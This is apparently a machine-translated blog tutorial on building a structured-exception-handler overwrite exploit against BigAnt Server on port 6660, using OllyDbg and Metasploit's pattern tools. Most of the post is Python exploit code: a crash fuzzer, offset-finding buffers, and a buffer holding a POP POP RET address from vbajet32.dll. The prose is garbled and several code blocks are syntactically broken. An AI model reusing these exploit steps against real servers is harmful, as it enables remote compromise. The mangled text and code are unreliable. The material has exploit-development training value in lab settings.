First of all Big-AntServer then run, run well and then attach antserver.exe into OllyDbgOllyDbg.
After successfully attach a process antserver into OllyDbg, run the following applicationfuzzer
#!usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer="USV
"+"\x41"*2500+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
In the above we can see a fuzzer application fuzzer sends data into a buffer of 2500 bytes of BigAnt server. Notice what terjad on system memory applications
The next is to manually search for each module adri used for running applications. To seewhatmodules are used by applications running, click the Execute module-view menu.
After seeing what module is being used applications are running, copy the file intobacktrak vbajet32.dll. Then run the tool msfpescan that exist within metasploit and run as follows:
The above command will perform the reading function DllCharacteristic vbajet32.dlllocated within the module. After that is the command locate POP, POP RETN in thismodule by module-execute viev menu-select cbajet32.dll, after entering the right-click-search for-Sequance of Command
after ensuring that vbajet32.dll file can be used as a stepping stone in the process of SEHoverwrite the address, the next process is to look at how many bytes to overwrite SEHaddress. Tools used are pattern_create.rb
after that copy the results into the above pattern_create existing fuzzer created earlier
#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 6660
buffer = "USV"
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()
Run fuzzer you have changed and notice OllyDbg.
Then use pattern_offset to know on how many bytes of EIP overite
Further still using the same fuzzer, change into 966 byte buffer nlai to see if the calculationsare correct
#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 6660
buffer = "USV"
buffer + = "\ X90" * 962
buffer + = "\ xCC \ xCC \ xCC \ xCC"
buffer + = "\ X41 \ X41 \ X41 \ X41"
buffer + = "\ X90" * (2504-len (buffer))
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()
Fuzzer run back over and see the results in OllyDbg
Chain Seh then see whether the buffer \ X41 successful entry in the SEH handler
After getting the address byte is used for fishing SEH, it is time to enter an offset ofvbajet32.dll
import socket
target_address = "192.168.56.101"
target_port = 6660
buffer = "USV"
buffer + = "\ X90" * 962
buffer + = "\ xCC \ xCC \ xCC \ xCC"
buffer + = "\ x6A \ x19 \ x9A \ x0F"
buffer + = "\ X90" * (2504-len (buffer))
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()
Notice what the response from the application of OllyDbg
No comments:
Post a Comment